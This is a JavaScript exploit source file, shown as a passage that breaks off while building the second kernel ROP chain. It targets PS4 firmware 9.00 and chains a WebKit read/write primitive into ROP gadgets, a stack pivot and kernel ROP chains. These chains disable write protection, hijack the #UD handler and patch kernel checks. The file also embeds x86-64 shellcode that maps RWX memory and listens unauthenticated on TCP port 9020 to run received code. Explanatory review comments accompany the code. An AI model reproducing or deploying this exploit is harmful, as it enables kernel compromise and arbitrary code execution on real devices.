// Globals shared between the WebKit stage (userland) and the kernel stage.
// They are declared with `var` on purpose: later code reaches several of
// them as window.* properties (window.gadgets, window.nogc, window.syscalls,
// window.libKernelBase), which `let`/`const` would not provide.
var chain, kchain, kchain2;
var SAVED_KERNEL_STACK_PTR, KERNEL_BASE_PTR;
var webKitBase, webKitRequirementBase, libSceLibcInternalBase, libKernelBase;

// The DOM object whose vtable pointer is swapped to start each ROP chain.
var textArea = document.createElement("textarea");

// Module-relative offsets. Every value below is specific to one firmware
// build (the userland sanity check mentions fw 9.00); nothing validates them
// beyond that check, so a wrong table silently corrupts memory.
// -- libSceWebKit2 (WK)
const OFFSET_wk_vtable_first_element = 0x104F110;
const OFFSET_WK_memset_import = 0x000002A8;
const OFFSET_WK___stack_chk_fail_import = 0x00000178;
const OFFSET_WK_psl_builtin_import = 0xD68;
const OFFSET_WK_setjmp_gadget_one = 0x0106ACF7;
const OFFSET_WK_setjmp_gadget_two = 0x01ECE1D3;
const OFFSET_WK_longjmp_gadget_one = 0x0106ACF7;
const OFFSET_WK_longjmp_gadget_two = 0x01ECE1D3;
const OFFSET_WK2_TLS_IMAGE = 0x38e8020;
// -- WebKit requirement module (WKR)
const OFFSET_WKR_psl_builtin = 0x33BA0;
// -- libSceLibcInternal
const OFFSET_libcint_memset = 0x0004F810;
const OFFSET_libcint_setjmp = 0x000BB5BC;
const OFFSET_libcint_longjmp = 0x000BB616;
// -- libkernel
const OFFSET_lk___stack_chk_fail = 0x0001FF60;
const OFFSET_lk_pthread_create = 0x00025510;
const OFFSET_lk_pthread_join = 0x0000AFA0;

// Objects whose backing stores are handed to native code; kept here so the
// GC never reclaims them while a pointer into them is still live.
var nogc = [];
// syscall number -> address of a `syscall` stub inside libkernel (filled by userland()).
var syscalls = {};
// gadget name -> absolute address (filled by userland() and extra_gadgets()).
var gadgets = {};
// Gadget tables. Each value is an offset from the base of the named module;
// absolute addresses are computed in userland() (WK, WKR) and extra_gadgets()
// (WK2, HMD, IPMI). The key is the disassembly of the gadget as the chains
// expect it; every gadget is assumed to end in `ret` unless the key says
// otherwise. Offsets are firmware-specific and are not validated at runtime.

// libSceWebKit2 (webKitBase-relative)
var wk_gadgetmap = {
    "ret": 0x32,
    "pop rdi": 0x319690,
    "pop rsi": 0x1F4D6,
    "pop rdx": 0x986C,
    "pop rcx": 0x657B7,
    "pop r8": 0xAFAA71,
    "pop r9": 0x422571,
    "pop rax": 0x51A12,
    "pop rsp": 0x4E293,
    "mov [rdi], rsi": 0x1A97920,
    "mov [rdi], rax": 0x10788F7,
    "mov [rdi], eax": 0x9964BC,
    // Used as the first kernel-side gadget: interrupts are disabled while the
    // stack is pivoted and re-enabled explicitly with "sti" in the krop chain.
    "cli ; pop rax": 0x566F8,
    "sti": 0x1FBBCC,
    "mov rax, [rax]": 0x241CC,
    "mov rax, [rsi]": 0x5106A0,
    "mov [rax], rsi": 0x1EFD890,
    "mov [rax], rdx": 0x1426A82,
    "mov [rax], edx": 0x3B7FE4,
    "add rax, rsi": 0x170397E,
    "mov rdx, rax": 0x53F501,
    "add rax, rcx": 0x2FBCD,
    // Installed as the #UD handler in kchain_setup() to pivot into kchain2.
    "mov rsp, rdi": 0x2048062,
    "mov rdi, [rax + 8] ; call [rax]": 0x751EE7,
    "infloop": 0x7DFF,
    "mov [rax], cl": 0xC6EAF,
};

// WebKit requirement module (webKitRequirementBase-relative)
var wkr_gadgetmap = {
    // Stack pivot used from the fake filterops: rsp <- rdi, then tail into
    // the `cli ; pop rax` gadget placed at fake_filtops - 0x79 (see object_setup).
    "xchg rdi, rsp ; call [rsi - 0x79]": 0x1d74f0 // JOP 3
};

// Second libSceWebKit2 mapping loaded via sys_dynlib_load_prx (see extra_gadgets)
var wk2_gadgetmap = {
    "mov [rax], rdi": 0xFFDD7,
    "mov [rax], rcx": 0x2C9ECA,
    "mov [rax], cx": 0x15A7D52,
};

// libSceHmd
var hmd_gadgetmap = {
    // Used to rebase: [KERNEL_BASE_PTR] += r12 (see kchain_setup).
    "add [r8], r12": 0x2BCE1
};

// libSceIpmi
var ipmi_gadgetmap = {
    "mov rcx, [rdi] ; mov rsi, rax ; call [rcx + 0x30]": 0x344B
};
function userland() {
    //RW -> ROP method is strongly based off of:
    //https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit
    //
    // Turns the arbitrary read/write primitive `p` (read1/read4/read8/write4/
    // write8/leakval; defined outside this file) into a ROP primitive:
    //  1. leak module bases from the textarea vtable and its PLT imports,
    //  2. resolve the WK/WKR gadgets into window.gadgets,
    //  3. build a setjmp/longjmp based stack pivot (launch_chain),
    //  4. scan libkernel's .text for `syscall` stubs so rop.syscall(n) works.
    // Side effects: installs helpers on `p`, fills window.gadgets and
    // window.syscalls, and sets the module base globals.
    p.launch_chain = launch_chain;
    p.malloc = malloc;
    p.malloc32 = malloc32;
    p.stringify = stringify;
    p.array_from_address = array_from_address;
    p.readstr = readstr;

    //pointer to vtable address
    var textAreaVtPtr = p.read8(p.leakval(textArea).add32(0x18));
    //address of vtable
    var textAreaVtable = p.read8(textAreaVtPtr);
    //use address of 1st entry (in .text) to calculate webkitbase
    webKitBase = p.read8(textAreaVtable).sub32(OFFSET_wk_vtable_first_element);

    // Each import is a `jmp [rip+disp32]` PLT stub; get_jmptgt returns the GOT
    // slot, whose content is the imported function's address. Subtracting the
    // known offset of that function yields the module base.
    libSceLibcInternalBase = p.read8(get_jmptgt(webKitBase.add32(OFFSET_WK_memset_import)));
    libSceLibcInternalBase.sub32inplace(OFFSET_libcint_memset);
    libKernelBase = p.read8(get_jmptgt(webKitBase.add32(OFFSET_WK___stack_chk_fail_import)));
    libKernelBase.sub32inplace(OFFSET_lk___stack_chk_fail);
    webKitRequirementBase = p.read8(get_jmptgt(webKitBase.add32(OFFSET_WK_psl_builtin_import)));
    webKitRequirementBase.sub32inplace(OFFSET_WKR_psl_builtin);

    for (var gadget in wk_gadgetmap) {
        window.gadgets[gadget] = webKitBase.add32(wk_gadgetmap[gadget]);
    }
    for (var gadget in wkr_gadgetmap) {
        window.gadgets[gadget] = webKitRequirementBase.add32(wkr_gadgetmap[gadget]);
    }

    // Resolve the target of a `jmp qword ptr [rip+disp32]` (FF 25 disp32) stub
    // at `address`: returns the absolute address of the referenced slot.
    // Returns the number 0 when the bytes do not match.
    // NOTE(review): the three callers above dereference the result without
    // checking for 0, so a wrong OFFSET_* table becomes a read from address 0.
    function get_jmptgt(address) {
        var instr = p.read4(address) & 0xFFFF; // first two opcode bytes, little-endian
        var offset = p.read4(address.add32(2)); // disp32
        if (instr != 0x25FF) {
            return 0;
        }
        return address.add32(0x6 + offset); // rip after the 6-byte instruction + disp32
    }

    // Allocate `sz` bytes the GC will not move or free and return the address
    // of the backing store. The Uint8Array is kept alive via window.nogc; the
    // pointer is read from offset 0x10 of the view object (the backing-store
    // slot on this WebKit build). `ptr.backing` lets callers write through JS.
    // The 0x10000 slack presumably keeps the allocation out of the small-object
    // heap so the backing store is stable — TODO confirm.
    function malloc(sz) {
        var backing = new Uint8Array(0x10000 + sz);
        window.nogc.push(backing);
        var ptr = p.read8(p.leakval(backing).add32(0x10));
        ptr.backing = backing;
        return ptr;
    }

    // Same as malloc but sized in 32-bit words; `ptr.backing` is a Uint32Array
    // over the same buffer (used for the shellcode writers in run_hax/patch_once).
    function malloc32(sz) {
        var backing = new Uint8Array(0x10000 + sz * 4);
        window.nogc.push(backing);
        var ptr = p.read8(p.leakval(backing).add32(0x10));
        ptr.backing = new Uint32Array(backing.buffer);
        return ptr;
    }

    // Return a Uint32Array whose backing store is redirected to `addr` with
    // `size` elements, by overwriting the view's vector pointer (+0x10) and
    // length (+0x18). The 32-bit write of 1 at +0x1C presumably sets the view's
    // mode/offset field — TODO confirm against this WebKit build. The original
    // buffer is leaked on purpose (array kept in nogc).
    function array_from_address(addr, size) {
        var og_array = new Uint32Array(0x1000);
        var og_array_i = p.leakval(og_array).add32(0x10);
        p.write8(og_array_i, addr);
        p.write4(og_array_i.add32(0x8), size);
        p.write4(og_array_i.add32(0xC), 0x1);
        nogc.push(og_array);
        return og_array;
    }

    // Copy `str` into a NUL-terminated byte buffer (low byte of each code unit
    // only; non-ASCII is truncated) and return its address. Kept alive via nogc.
    function stringify(str) {
        var bufView = new Uint8Array(str.length + 1);
        for (var i = 0; i < str.length; i++) {
            bufView[i] = str.charCodeAt(i) & 0xFF;
        }
        window.nogc.push(bufView);
        return p.read8(p.leakval(bufView).add32(0x10));
    }

    // Read a NUL-terminated byte string at `addr` (one byte per char, no bound).
    function readstr(addr) {
        var str = "";
        for (var i = 0; ; i++) {
            var c = p.read1(addr.add32(i));
            if (c == 0x0) {
                break;
            }
            str += String.fromCharCode(c);
        }
        return str;
    }

    // Stack pivot setup. Two fake vtables are built; swapping textArea's vtable
    // pointer to one of them and touching textArea.scrollLeft calls the slot at
    // +0x1C8 with rcx = the fake vtable. The two WK gadgets then reach
    // libc setjmp()/longjmp() with rdi = a jmp_buf we control:
    //   setjmp vtable  -> setjmp(original_context)  (saves the JS thread's state)
    //   longjmp vtable -> longjmp(modified_context) (rsp/rip taken from us)
    var fakeVtable_setjmp = p.malloc32(0x200);
    var fakeVtable_longjmp = p.malloc32(0x200);
    var original_context = p.malloc32(0x40);
    var modified_context = p.malloc32(0x40);

    p.write8(fakeVtable_setjmp.add32(0x0), fakeVtable_setjmp);            // [rcx] -> rax = this table
    p.write8(fakeVtable_setjmp.add32(0xA8), webKitBase.add32(OFFSET_WK_setjmp_gadget_two)); // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8]
    p.write8(fakeVtable_setjmp.add32(0x10), original_context);            // becomes rdi (jmp_buf)
    p.write8(fakeVtable_setjmp.add32(0x8), libSceLibcInternalBase.add32(OFFSET_libcint_setjmp));
    p.write8(fakeVtable_setjmp.add32(0x1C8), webKitBase.add32(OFFSET_WK_setjmp_gadget_one)); // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8]

    p.write8(fakeVtable_longjmp.add32(0x0), fakeVtable_longjmp);
    p.write8(fakeVtable_longjmp.add32(0xA8), webKitBase.add32(OFFSET_WK_longjmp_gadget_two)); // mov rdi, qword ptr [rdi + 0x10] ; jmp qword ptr [rax + 8]
    p.write8(fakeVtable_longjmp.add32(0x10), modified_context);
    p.write8(fakeVtable_longjmp.add32(0x8), libSceLibcInternalBase.add32(OFFSET_libcint_longjmp));
    p.write8(fakeVtable_longjmp.add32(0x1C8), webKitBase.add32(OFFSET_WK_longjmp_gadget_one)); // mov rax, qword ptr [rcx]; mov rdi, rcx; jmp qword ptr [rax + 0xA8]

    // Run `chain` (a rop object; chain.stack is the address of its frames) on
    // the current thread and return to JS afterwards:
    //  - append `longjmp(original_context)` so the chain resumes the saved state,
    //  - setjmp via the fake vtable to capture that state,
    //  - patch modified_context: +0x00 rip = `ret`, +0x10 rsp = chain.stack,
    //    +0x40 copied verbatim from original_context (presumably a field libc's
    //    longjmp validates — TODO confirm),
    //  - longjmp via the second fake vtable to pivot, then restore the vtable.
    // NOTE: the real vtable is only restored after the chain returns; if the
    // chain faults, textArea is left pointing at the fake table.
    function launch_chain(chain) {
        chain.push(window.gadgets["pop rdi"]);
        chain.push(original_context);
        chain.push(libSceLibcInternalBase.add32(OFFSET_libcint_longjmp));
        p.write8(textAreaVtPtr, fakeVtable_setjmp);
        textArea.scrollLeft = 0x0;
        p.write8(modified_context.add32(0x00), window.gadgets["ret"]);
        p.write8(modified_context.add32(0x10), chain.stack);
        p.write8(modified_context.add32(0x40), p.read8(original_context.add32(0x40)))
        p.write8(textAreaVtPtr, fakeVtable_longjmp);
        textArea.scrollLeft = 0x0;
        p.write8(textAreaVtPtr, textAreaVtable);
    }

    // Build window.syscalls by scanning libkernel: temporarily point a
    // Uint8Array's backing store at libKernelBase (length 0x40000).
    var kview = new Uint8Array(0x1000);
    var kstr = p.leakval(kview).add32(0x10);
    var orig_kview_buf = p.read8(kstr);
    p.write8(kstr, window.libKernelBase);
    p.write4(kstr.add32(8), 0x40000);

    // Find the first occurrence of the ASCII bytes "rdloc" and use its offset
    // as the end of the region to scan (presumably the start of string data
    // following .text — TODO confirm).
    // NOTE(review): if the marker is not found, `countbytes` stays undefined,
    // the length write below becomes NaN and the scan loop does not run, so
    // window.syscalls would be empty; the sanity check at the end catches this.
    var countbytes;
    for (var i = 0; i < 0x40000; i++) {
        if (kview[i] == 0x72 && kview[i + 1] == 0x64 && kview[i + 2] == 0x6c && kview[i + 3] == 0x6f && kview[i + 4] == 0x63) {
            countbytes = i;
            break;
        }
    }
    p.write4(kstr.add32(8), countbytes + 32);

    // Match the libkernel syscall stub pattern
    //   48 C7 C0 imm32   mov rax, imm32
    //   49 89 CA         mov r10, rcx
    //   0F 05            syscall
    // and record libKernelBase + offset under the decoded imm32 (syscall number).
    var dview32 = new Uint32Array(1);
    var dview8 = new Uint8Array(dview32.buffer);
    for (var i = 0; i < countbytes; i++) {
        if (kview[i] == 0x48 && kview[i + 1] == 0xc7 && kview[i + 2] == 0xc0 && kview[i + 7] == 0x49 && kview[i + 8] == 0x89 && kview[i + 9] == 0xca && kview[i + 10] == 0x0f && kview[i + 11] == 0x05) {
            dview8[0] = kview[i + 3];
            dview8[1] = kview[i + 4];
            dview8[2] = kview[i + 5];
            dview8[3] = kview[i + 6];
            var syscallno = dview32[0];
            window.syscalls[syscallno] = window.libKernelBase.add32(i);
        }
    }
    // Put the view back on its own buffer (length is left at countbytes + 32).
    p.write8(kstr, orig_kview_buf);

    chain = new rop();
    //Sanity check
    // syscall 20 is getpid on FreeBSD-derived kernels; a zero result means the
    // ROP primitive (or the syscall table) is broken — stop instead of
    // corrupting memory further.
    if (chain.syscall(20).low == 0) {
        alert("webkit exploit failed. Try again if your ps4 is on fw 9.00.");
        while (1);
    }
}
// Entry point. Runs the WebKit stage, runs the kernel stage only if the
// process is not yet allowed to setuid(0), then starts the payload loader
// on a new thread and hands off to awaitpl() (defined elsewhere).
function run_hax() {
    userland();
    // syscall 23 = setuid; a non-zero return means the kernel has not been
    // patched yet (KERNEL_setuid is patched by kchain2), so run the kernel
    // exploit. A second setuid(0) at the end of trigger_spray confirms success.
    if (chain.syscall(23, 0).low != 0x0) {
        kernel();
        //this wk exploit is pretty stable we can probably afford to kill webkit before payload loader but should we?.
        //p.write8(0x0, 0x0); //write to 0x0 -> kill browser.
    }

    // syscall 477 = mmap(NULL, 0x300000, PROT_READ|WRITE|EXEC (7), 0x1000, -1, 0).
    // Flag 0x1000 is MAP_ANON on FreeBSD. The mapping is RWX and is where the
    // network payload is written to and executed from.
    var payload_buffer = chain.syscall(477, 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
    var payload_loader = p.malloc32(0x1000);

    //NOTE: You can replace this with a payload instead of the loader.
    //You would need to create an array view of payload_buffer to do that. (var payload_writer = p.array_from_address(payload_buffer);)
    //And other ways, ....
    //This is x86_64 asm, you can disassemble it* if you want to know what the payload loader does under the hood. (* will need to account for endianness)
    //
    // What the bytes below decode to (little-endian dwords), for reviewers:
    //   - builds a sockaddr_in on the stack: len 0x10, AF_INET (2),
    //     port 0x233C = 9020 (big-endian), address 0 (INADDR_ANY);
    //   - socket(2,1,0) -> bind -> listen(1) -> accept(NULL,NULL);
    //   - writes a `ret` (0xC3) to payload_buffer[0], then read()s 0x1000
    //     bytes at a time into payload_buffer until read() returns <= 0;
    //   - close()s both fds, `call [rsp]` into payload_buffer, returns 0.
    //   The trailing stubs are `mov rax, N ; mov r10, rcx ; syscall ; ret`
    //   for N = 3 (read), 6 (close), 30 (accept), 97 (socket), 104 (bind),
    //   106 (listen).
    // Security caveats grounded in that decode: the listener is unauthenticated
    // and bound to every interface, so any host that can reach TCP/9020 can
    // supply code that runs as this process; and the read loop has no bound
    // against the 0x300000 mapping size, so an oversized payload writes past
    // payload_buffer.
    var loader_writer = payload_loader.backing;
    loader_writer[0] = 0x56415741;
    loader_writer[1] = 0x83485541;
    loader_writer[2] = 0x894818EC;
    loader_writer[3] = 0xC748243C;
    loader_writer[4] = 0x10082444;
    loader_writer[5] = 0x483C2302;
    loader_writer[6] = 0x102444C7;
    loader_writer[7] = 0x00000000;
    loader_writer[8] = 0x000002BF;
    loader_writer[9] = 0x0001BE00;
    loader_writer[10] = 0xD2310000;
    loader_writer[11] = 0x00009CE8;
    loader_writer[12] = 0xC7894100;
    loader_writer[13] = 0x8D48C789;
    loader_writer[14] = 0xBA082474;
    loader_writer[15] = 0x00000010;
    loader_writer[16] = 0x000095E8;
    loader_writer[17] = 0xFF894400;
    loader_writer[18] = 0x000001BE;
    loader_writer[19] = 0x0095E800;
    loader_writer[20] = 0x89440000;
    loader_writer[21] = 0x31F631FF;
    loader_writer[22] = 0x0062E8D2;
    loader_writer[23] = 0x89410000;
    loader_writer[24] = 0x2C8B4CC6;
    loader_writer[25] = 0x45C64124;
    loader_writer[26] = 0x05EBC300;
    loader_writer[27] = 0x01499848;
    loader_writer[28] = 0xF78944C5;
    loader_writer[29] = 0xBAEE894C;
    loader_writer[30] = 0x00001000;
    loader_writer[31] = 0x000025E8;
    loader_writer[32] = 0x7FC08500;
    loader_writer[33] = 0xFF8944E7;
    loader_writer[34] = 0x000026E8;
    loader_writer[35] = 0xF7894400;
    loader_writer[36] = 0x00001EE8;
    loader_writer[37] = 0x2414FF00;
    loader_writer[38] = 0x18C48348;
    loader_writer[39] = 0x5E415D41;
    loader_writer[40] = 0x31485F41;
    loader_writer[41] = 0xC748C3C0;
    loader_writer[42] = 0x000003C0;
    loader_writer[43] = 0xCA894900;
    loader_writer[44] = 0x48C3050F;
    loader_writer[45] = 0x0006C0C7;
    loader_writer[46] = 0x89490000;
    loader_writer[47] = 0xC3050FCA;
    loader_writer[48] = 0x1EC0C748;
    loader_writer[49] = 0x49000000;
    loader_writer[50] = 0x050FCA89;
    loader_writer[51] = 0xC0C748C3;
    loader_writer[52] = 0x00000061;
    loader_writer[53] = 0x0FCA8949;
    loader_writer[54] = 0xC748C305;
    loader_writer[55] = 0x000068C0;
    loader_writer[56] = 0xCA894900;
    loader_writer[57] = 0x48C3050F;
    loader_writer[58] = 0x006AC0C7;
    loader_writer[59] = 0x89490000;
    loader_writer[60] = 0xC3050FCA;

    // syscall 74 = mprotect(payload_loader, 0x4000, RWX). Relies on the kernel
    // mprotect patch applied in kchain2 (KERNEL_mprotect) to allow PROT_EXEC
    // on this mapping.
    chain.syscall(74, payload_loader, 0x4000, (0x1 | 0x2 | 0x4));

    var pthread = p.malloc(0x10);
    // syscall 203 = mlock(payload_buffer, 0x300000): keep the payload pages
    // resident. Then pthread_create(&pthread, NULL, payload_loader, payload_buffer)
    // runs the loader above on its own thread with rdi = payload_buffer.
    {
        chain.fcall(window.syscalls[203], payload_buffer, 0x300000);
        chain.fcall(libKernelBase.add32(OFFSET_lk_pthread_create), pthread, 0x0, payload_loader, payload_buffer);
    }
    chain.run();
    awaitpl();
}
// Kernel stage, executed only while setuid(0) is still refused (see run_hax).
// Order matters: gadgets from extra modules must exist before the kernel ROP
// chains are built, the chains before the fake kqueue objects that point at
// them, and the heap spray/trigger last; patch_once runs native patch code
// after the kernel has been made writable.
function kernel() {
    var stages = [extra_gadgets, kchain_setup, object_setup, trigger_spray, patch_once];
    for (var stage of stages) {
        stage();
    }
}
// State shared by extra_gadgets() and load_prx():
//   handle      - buffer receiving the module handle from sys_dynlib_load_prx
//   random_path - the per-boot randomized app root returned by syscall 602
//   ex_info     - buffer receiving sys_dynlib_get_info_ex output
var handle, random_path, ex_info;
// Load the module `name` from <random_path>/common/lib/ and return the
// address of its TLS init image as reported by sys_dynlib_get_info_ex, which
// the callers use as the module's load base. For libSceWebKit2.sprx the
// TLS image lies inside the module and is rebased with OFFSET_WK2_TLS_IMAGE;
// any other module with a non-empty TLS segment is reported via alert().
// Uses the globals handle/random_path/ex_info set up by extra_gadgets().
// NOTE(review): both error paths only alert() and then continue, so a failed
// load still falls through to the info_ex call and the returned pointer is
// whatever was left in ex_info.
function load_prx(name) {
    //sys_dynlib_load_prx
    var res = chain.syscall(594, p.stringify(`/${random_path}/common/lib/${name}`), 0x0, handle, 0x0);
    if (res.low != 0x0) {
        alert("failed to load prx/get handle " + name);
    }
    //sys_dynlib_get_info_ex
    // The first qword of the output buffer carries the struct size (0x1A8).
    p.write8(ex_info, 0x1A8);
    res = chain.syscall(608, p.read4(handle), 0x0, ex_info);
    if (res.low != 0x0) {
        alert("failed to get module info from handle");
    }
    // +0x110: TLS init image address, +0x11C: TLS size (field layout taken
    // from how the values are used here; not otherwise verified).
    var tlsinit = p.read8(ex_info.add32(0x110));
    var tlssize = p.read4(ex_info.add32(0x11C));
    if (tlssize != 0) {
        if (name == "libSceWebKit2.sprx") {
            tlsinit.sub32inplace(OFFSET_WK2_TLS_IMAGE);
        } else {
            alert(`${name}, tlssize is non zero. this usually indicates that this module has a tls phdr with real data. You can hardcode the imgage to base offset here if you really wish to use one of these.`);
        }
    }
    return tlsinit;
}
//Obtain extra gadgets through module loading
// Resolve gadgets that live in modules not mapped by default: load them via
// load_prx(), add their offsets to window.gadgets, then mlock() every gadget
// so the kernel-side chains (which run with the page tables of this process)
// never hit a paged-out gadget.
function extra_gadgets() {
    handle = p.malloc(0x1E8);
    // One allocation carved into three buffers:
    //   +0x00 module handle (4 bytes, read by load_prx)
    //   +0x04 in/out length for syscall 602
    //   +0x14 randomized path string (0x2C bytes requested)
    //   +0x54 dynlib info_ex output (0x1A8 bytes; fits thanks to malloc's slack)
    var randomized_path_length_ptr = handle.add32(0x4);
    var randomized_path_ptr = handle.add32(0x14);
    ex_info = randomized_path_ptr.add32(0x40);

    p.write8(randomized_path_length_ptr, 0x2C);
    // syscall 602: presumably sys_randomized_path, returning the per-boot
    // randomized directory the app's /common/lib lives under — not verified here.
    chain.syscall(602, 0, randomized_path_ptr, randomized_path_length_ptr);
    random_path = p.readstr(randomized_path_ptr);

    var ipmi_addr = load_prx("libSceIpmi.sprx");
    var hmd_addr = load_prx("libSceHmd.sprx");
    var wk2_addr = load_prx("libSceWebKit2.sprx");

    for (var gadget in hmd_gadgetmap) {
        window.gadgets[gadget] = hmd_addr.add32(hmd_gadgetmap[gadget]);
    }
    for (var gadget in wk2_gadgetmap) {
        window.gadgets[gadget] = wk2_addr.add32(wk2_gadgetmap[gadget]);
    }
    for (var gadget in ipmi_gadgetmap) {
        window.gadgets[gadget] = ipmi_addr.add32(ipmi_gadgetmap[gadget]);
    }

    for (var gadget in window.gadgets) {
        // Touch the page from userland first (faults it in); the value is discarded.
        p.read8(window.gadgets[gadget]);
        //Ensure all gadgets are available to kernel.
        // syscall 203 = mlock(gadget, 0x10)
        chain.fcall(window.syscalls[203], window.gadgets[gadget], 0x10);
    }
    chain.run();
}
//Build the kernel rop chain, this is what the kernel will be executing when the fake obj pivots the stack.
// Build the two kernel ROP chains (globals kchain, kchain2) that run once the
// corrupted knote pivots the kernel stack into kchain.stack (see object_setup).
//   kchain : save the original kernel rsp, derive the kernel base, disable
//            CR0.WP and hand over to kchain2 via a temporarily hijacked #UD.
//   kchain2: apply the kernel code patches, restore #UD and CR0, and return
//            into the kernel as if kqueue_close had finished normally.
// All KERNEL_* constants are kernel-base-relative offsets for one firmware
// build; kwrite*/rax_kernel/write_kernel_addr_to_chain_later (from rop) add
// the base stored at KERNEL_BASE_PTR at run time.
function kchain_setup() {
    // Copy routines: patched with 0xEB (short jmp) below, presumably to skip
    // a check each of them performs — TODO confirm against the disassembly.
    const KERNEL_busy = 0x1B28DF8;
    const KERNEL_bcopy = 0xACD;
    const KERNEL_bzero = 0x2713FD;
    const KERNEL_pagezero = 0x271441;
    const KERNEL_memcpy = 0x2714BD;
    const KERNEL_pagecopy = 0x271501;
    const KERNEL_copyin = 0x2716AD;
    const KERNEL_copyinstr = 0x271B5D;
    const KERNEL_copystr = 0x271C2D;
    const KERNEL_setidt = 0x312c40;
    const KERNEL_setcr0 = 0x1FB949;
    const KERNEL_Xill = 0x17d500;          // the stock #UD handler, restored by kchain2
    const KERNEL_veriPatch = 0x626874;
    const KERNEL_enable_syscalls_1 = 0x490;
    const KERNEL_enable_syscalls_2 = 0x4B5;
    const KERNEL_enable_syscalls_3 = 0x4B9;
    const KERNEL_enable_syscalls_4 = 0x4C2;
    const KERNEL_mprotect = 0x80B8D;
    const KERNEL_prx = 0x23AEC4;
    const KERNEL_dlsym_1 = 0x23B67F;
    const KERNEL_dlsym_2 = 0x221b40;
    const KERNEL_setuid = 0x1A06;
    const KERNEL_syscall11_1 = 0x1100520;  // sysent[11] fields (see writes below)
    const KERNEL_syscall11_2 = 0x1100528;
    const KERNEL_syscall11_3 = 0x110054C;
    const KERNEL_syscall11_gadget = 0x4c7ad;
    const KERNEL_mmap_1 = 0x16632A;
    const KERNEL_mmap_2 = 0x16632D;
    const KERNEL_setcr0_patch = 0x3ade3B;
    const KERNEL_kqueue_close_epi = 0x398991;

    // Two adjacent qwords: [+0] original kernel rsp at pivot time,
    // [+8] kernel base (KERNEL_BASE_PTR). Both are computed inside kchain.
    SAVED_KERNEL_STACK_PTR = p.malloc(0x200);
    KERNEL_BASE_PTR = SAVED_KERNEL_STACK_PTR.add32(0x8);
    //negative offset of kqueue string to kernel base
    //0xFFFFFFFFFF86B593 0x505
    //0xFFFFFFFFFF80E364 0x900
    // Seeded with the (negative) distance from the kernel pointer left in r12
    // at pivot time to the kernel base; `add [r8], r12` below turns it into
    // the base. Firmware-specific (9.00 value in use).
    p.write8(KERNEL_BASE_PTR, new int64(0xFF80E364, 0xFFFFFFFF));

    kchain = new rop();
    kchain2 = new rop();
    //Ensure the krop stack remains available.
    // syscall 203 = mlock: the kernel will execute from these user pages, so
    // they must not be paged out.
    {
        chain.fcall(window.syscalls[203], kchain.stackback, 0x40000);
        chain.fcall(window.syscalls[203], kchain2.stackback, 0x40000);
        chain.fcall(window.syscalls[203], SAVED_KERNEL_STACK_PTR, 0x10);
    }
    chain.run();

    kchain.count = 0;
    kchain2.count = 0;
    kchain.set_kernel_var(KERNEL_BASE_PTR);
    kchain2.set_kernel_var(KERNEL_BASE_PTR);

    // --- kchain -----------------------------------------------------------
    // Entered right after `xchg rdi, rsp` (see object_setup), so rdi holds the
    // original kernel stack pointer; save it.
    kchain.push(gadgets["pop rax"]);
    kchain.push(SAVED_KERNEL_STACK_PTR);
    kchain.push(gadgets["mov [rax], rdi"]);
    // [KERNEL_BASE_PTR] += r12  -> kernel base (see the seed write above).
    kchain.push(gadgets["pop r8"]);
    kchain.push(KERNEL_BASE_PTR);
    kchain.push(gadgets["add [r8], r12"]);
    //Sorry we're closed
    // Sets a kernel flag before interrupts are re-enabled; cleared again in
    // kchain2 once the patches are in ("timer-y interrupts" per the comment
    // there — exact semantics of the flag not verified here).
    kchain.kwrite1(KERNEL_busy, 0x1);
    kchain.push(gadgets["sti"]); //it should be safe to re-enable interrupts now.

    var idx1 = kchain.write_kernel_addr_to_chain_later(KERNEL_setidt);
    var idx2 = kchain.write_kernel_addr_to_chain_later(KERNEL_setcr0);
    //Modify UD
    // setidt(6 /* #UD */, gadget "mov rsp, rdi", 0xE /* interrupt gate */, 0, 0):
    // while this is installed, any #UD pivots the kernel onto rdi.
    kchain.push(gadgets["pop rdi"]);
    kchain.push(0x6);
    kchain.push(gadgets["pop rsi"]);
    kchain.push(gadgets["mov rsp, rdi"]);
    kchain.push(gadgets["pop rdx"]);
    kchain.push(0xE);
    kchain.push(gadgets["pop rcx"]);
    kchain.push(0x0);
    kchain.push(gadgets["pop r8"]);
    kchain.push(0x0);
    var idx1_dest = kchain.get_rsp();
    kchain.pushSymbolic(); // overwritten with KERNEL_setidt
    // setcr0(0x80040033) with rdi = kchain2.stack: 0x80040033 is the value
    // restored later (0x80050033) with bit 16 (CR0.WP) cleared, making kernel
    // .text writable. The hijacked #UD handler above then pivots into kchain2
    // with rsp = rdi — i.e. the WP change is expected to raise #UD on this
    // firmware (presumably a write-protection check; TODO confirm).
    kchain.push(gadgets["pop rsi"]);
    kchain.push(0x80040033);
    kchain.push(gadgets["pop rdi"]);
    kchain.push(kchain2.stack);
    var idx2_dest = kchain.get_rsp();
    kchain.pushSymbolic(); // overwritten with KERNEL_setcr0
    kchain.finalizeSymbolic(idx1, idx1_dest);
    kchain.finalizeSymbolic(idx2, idx2_dest);

    // --- kchain2 ----------------------------------------------------------
    //Initial patch(es)
    // 0x9090 = two NOPs, 0xEB = short jmp (skips the following conditional),
    // 0xE990 = NOP followed by the start of a jmp rel32.
    kchain2.kwrite2(KERNEL_veriPatch, 0x9090);
    kchain2.kwrite1(KERNEL_bcopy, 0xEB);
    //might as well do the others
    kchain2.kwrite1(KERNEL_bzero, 0xEB);
    kchain2.kwrite1(KERNEL_pagezero, 0xEB);
    kchain2.kwrite1(KERNEL_memcpy, 0xEB);
    kchain2.kwrite1(KERNEL_pagecopy, 0xEB);
    kchain2.kwrite1(KERNEL_copyin, 0xEB);
    kchain2.kwrite1(KERNEL_copyinstr, 0xEB);
    kchain2.kwrite1(KERNEL_copystr, 0xEB);
    //I guess you're not all that bad...
    kchain2.kwrite1(KERNEL_busy, 0x0); //it should now be safe to handle timer-y interrupts again
    //Restore original UD
    // setidt(6, KERNEL_Xill, 0xE, 0, 0)
    var idx3 = kchain2.write_kernel_addr_to_chain_later(KERNEL_Xill);
    var idx4 = kchain2.write_kernel_addr_to_chain_later(KERNEL_setidt);
    kchain2.push(gadgets["pop rdi"]);
    kchain2.push(0x6);
    kchain2.push(gadgets["pop rsi"]);
    var idx3_dest = kchain2.get_rsp();
    kchain2.pushSymbolic(); // overwritten with KERNEL_Xill
